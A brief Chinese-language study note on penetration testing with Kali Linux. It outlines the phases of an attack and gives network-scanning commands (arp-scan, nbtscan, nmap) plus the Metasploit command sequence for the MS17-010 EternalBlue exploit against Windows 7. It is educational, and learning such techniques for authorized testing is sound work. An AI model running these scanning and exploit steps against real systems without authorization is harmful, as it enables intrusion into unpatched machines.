Kali Linux 渗透测试原理与实践
Kali Linux 渗透测试原理与实践
渗透测试:模拟黑客行为对目标系统发起攻击,根据攻击结果得到安全评估报告
渗透前期:(网络踩点,网络扫描,网络查点)
渗透中期:(利用漏洞信息进行渗透攻击,获取权限)
渗透后期:(后渗透维持攻击,文件拷贝,木马植入)
信息收集( 扫描 )
arp-scan/nbtscan:局域网扫描(发送一个探测包,检测启动了什么服务)
nmap端口扫描 电脑漏洞也可以扫描
openvas/nessus 漏洞扫描
安装kali linux 百度有具体步骤
打开执行 nbtscan +网段 可以看到目前网段内的主机
执行 arp-scan --interface=eth0 +网段如(172.16.70.0/24)网段扫描
nmap
Exploit/POC:渗透测试代码,根据存在的漏洞,编写攻击代码。
MS17-010漏洞 “永恒之蓝”漏洞利用
Kali Linux-->windows7 (常规流程)
msf-->search ms17_010
msf-->use exploit/windows/smb/ms17_010_eternalblue
msf-->exploit
show options